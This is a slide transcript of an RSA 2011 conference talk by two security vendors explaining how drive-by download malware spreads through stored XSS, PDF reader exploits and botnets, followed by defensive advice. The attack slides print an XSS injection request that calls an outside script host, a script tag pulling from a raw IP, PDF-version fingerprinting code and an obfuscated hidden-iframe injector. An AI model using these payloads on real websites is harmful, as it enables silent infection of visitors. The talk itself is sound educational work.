drive by downloads: how to avoid getting a cap popped in your app
DESCRIPTION
Presentation delivered at the RSA 2011 Conference on how to better protect your website from hacker attacksTRANSCRIPT
Session ID: xxx-xxxx
Session Classification: xxxxxxxxxxxx
Lars Ewe, Cenzic
Neil Daswani, Dasient
Drive By Downloads: How To Avoid Getting a Cap
Popped in Your App
Drive-By via XSS on RSA Conf Website
Discovered by Gerry Eisenhaur (Dasient)
Persistent XSS in Jive
“Benign” drive-by injected / Pops up calc.exe
Script element embedded in a “tag” at:https://365.rsaconference.com/people/gerrye?view=bookmarks
Un-escaped tag (and benign drive-by) rendered athttps://365.rsaconference.com/view-profile-favorites-list.jspa?targetUser=18102
Yet again -- use of SSL alone does not provide security – code must be made secure also!
Check This Out …
Agenda
Quick History of Security
Malware Anatomy & Distribution
Lifecycle of Malware Protection
Future of Web Security
5
Quick History: Security
Evolution of Security
1980s
Anti-Virus
1986: Brain Virus
(Pakistan)
1990: More viruses –
Fish, Flip, Whale.
1991-98: Famous
Michelangelo.
Symantec introduces
Norton
1998 – 2004: Internet
surge, new viruses =
(Melissa, I love
you, Nimda, SQL
Slammer, Sobig.F, Naa
chi, Sasser) cause
havoc
Over 60K known
viruses. Frequent
updates provided by
vendors.
1990s
Network Security
Late 90s – With the
Explosion of Internet,
network firewalls control
traffic
Intrusion Detection
Systems (IDS)
introduced to monitor
anomalous activity
Intrusion Prevention
Systems (IPS)
combined IDS &
network firewalls
Network vulnerability
scanning tools
introduced to aid
vulnerability
management
2000s
Application Security
Late 90s: Internet growth, companies
tighten the perimeter but ignore
applications
Some vulnerability scanning tools &
WAFs deployed, but security holes
remain – especially for custom apps
Drive-by-downloads mature from
prototype attacks to mainstream
2007: SQL Injection used to inject
malicious drive-by-download code in
addition to data theft
2009: Gumblar web worm infects 80K
servers, Web malware used in Aurora
attack, widget attacks
2010: Over 1M web sites infected in
1 quarter, large Gov websites hit
(NIH, US Treasury, EPA)
Fundamental Change in Malware Distribution
Distribution
methods
Form of malware
Floppy Disks,
Worms
attachments,
file downloads
Drive-by-
downloads (at
legitimate sites)
Active content on
web pages
Late 80s to 90s Late 90s to mid-2000s Mid-2000s to present
Executable code in
static file
Websites suffer brand,
revenue, and customer
losses when infected
Infect clients Infect servers to infect clients
What’s exploited PC, OS, client-side
apps
Web applications
and servers
8
Malware Anatomy & Distribution
Step 1: Infect a Site (or 2 or 3 or Thousands!)
Ads (Malvertising)
Mash-ups
Widgets
External images
User generated content
(HTML, images, links,
exe, documents)
Software
vulnerabilities
Web 2.0/
external content
Infrastructure
vulnerabilitiesPasswords
compromised
There is no perimeter
SQL Injection
XSS
PHP file include
Un-patched
Software (blog,
CMS, shopping cart)
FTP credentials
SSH credentials
Web server credentials
Vulnerable
hosting platform
Network
vulnerabilities
Step 1. Infect via Stored XSS
Http request to inject script:
Server’s response contains:
http://www.mywwwservice.com/update_profile?
Favorite_food=cookies+%3Cscript
src=baddomain.com%3E%3C/script%3E
<p>Your favorite food is 'cookies <script
src=baddomain.com></script>' returned the following
results:</p>
Step 1: Inject Really Malicious JavaScript
Step 1: Inject Really Malicious JavaScript
Step 1: Inject Really Malicious JavaScript
Sources in malicious JavaScript from a compromised IP!
Infects user's machine silently
<script id=_0_ src=//218.93.202.61/cp/></script>
Step 2: Invoke Client-Side Vulnerability
CVE-2008-2992Description: Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104
CVE-2007-5659Description: Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods.
CVE-2009-0927Description: Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIconmethod of a Collab object.
Step 2: Ex. Fingerprint PDF Reader
JavaScript generates a zero-size IFRAME in web page sources in a PDF file
PDF file has JavaScript that fingerprints the version of the PDF reader (Note: JavaScript interpreter used by PDF reader is different than JavaScript interpreter used by browser)
Attacker needs to determine which version of the PDF reader / JavaScript interpreter to target
Step 2: Ex. Fingerprint PDF Reader
function pdf_start(){var
version=app.viewerVersion.toString();version=version.
replace(/\D/g,'');var version_array=new
Array(version.charAt(0),version.charAt(1),version.cha
rAt(2));if((version_array[0]==8)&&(version_array[1]==
0)||(version_array[1]==1&&version_array[2]DA3)){util_
printf();}
if((version_array[0]DA8)||(version_array[0]==8&&versi
on_array[1]DA2&&version_array[2]DA2)){collab_email();
}
if((version_array[0]DA9)||(version_array[0]==9&&versi
on_array[1]DA1)){collab_geticon();}} pdf_start();}
Step 3: Deliver Shellcode
Depending upon version of Adobe PDF Reader / JavaScript interpreter, send appropriate shellcode
“Spray” the heap with assembly instructions that give shell access
Call a PDF reader helper function that jumps to shellcode on the heap (e.g., collab_email())
Step 4: Send ‘Downloader’
Example: 2k8.exe
Step 5: Join a Botnet: e.g. Zeus
Zeus Botnet + Targeted Phishing
Botnet propagation + Targeted Phishing:1. http://internetbanking.
gad.de/banking/
2. http://hsbc.co.uk
3. http://www.mybank.alliance-leicester.co.uk
4. http://www.citibank.de
What Next?
Steal credentials (e.g., Zeus)
Sell fake anti-virus (e.g., Koobface)
Steal FTP credentials (e.g., Gumblar)
Steal corporate secrets (e.g., Aurora)
Collect fraudulent click revenue (e.g., ClickbotA)
Evolution: Multi-DOM Node Injection
<div
id=f37z>*!@g$a+\*t*e##4a+@d^s!
.i!n$f+o@@</div>
<script>document.write('<iframe
src=\''+unescape(document.getEle
mentById('f37z').innerHTML.repla
ce(/[\+!*^#@$]/g,""))+'\' width=0
height=0></iframe>');
Evolution: Multi-DOM Node Injection
<div
id=f37z>*!@g$a+\*t*e##4a+@d^s!
.i!n$f+o@@</div>
<script>document.write('<iframe
src=\''+unescape(document.getEle
mentById('f37z').innerHTML.repla
ce(/[\+!*^#@$]/g,""))+'\' width=0
height=0></iframe>');
<iframe
src=gate4ad
s.info
width=0
height=0></i
frame>
Infection Library
Infection Library: Example Entry
26
Lifecycle of Malware Protection
Defense-In-Depth:Lifecycle of Malware Protection
Assess
Detect
Contain
Recover
Prevent
Vulnerability & Malware Risk Assessment
Security Design Review, Secure Coding
Practices, Fix Bugs, WAF, Code Reviews
Web Anti-Malware (WAM) Monitoring
mod_antimalware
Remove malcode
28
Future of Web Security
Risk Tolerance
F500
G1000
SME
SMB
Mission Critical
Security
Important
Security
Adequate
Security
Integrated Web Scanning
/ Malware Cloud Solution
(Cenzic / Dasient)
Broad offering
High volume
Low cost
On-premise software
Managed Service
Manage Website Risk: Fast & Easy
Test All Apps For HealthCheck
Strong Testing for Important Apps
Robust Testing for
Critical Apps
R
I
S
K
S
C
O
R
E
Low
High
Takeaways: What You Should Do Within 3 Months
Test ALL your web applications via a HealthCheck Test for both application vulnerabilities and malware
Prioritize your vulnerabilities based on risk score
Block until you remediate
Get Feb 2011 Ponemon research report on the state of web application security
Integrated HealthCheck Offer & Learn More
Get a Free, Integrated Website HealthCheck! Get a listing of all website
vulnerabilities in an easy to read report!
Just email: [email protected]
For more information on Web vulnerability scanning and malware, visit us! Cenzic
www.cenzic.com / http://blog.cenzic.com
Dasient www.dasient.com / http://blog.dasient.com
34
Thank You!
Lars Ewe, Cenzic
Neil Daswani, Dasient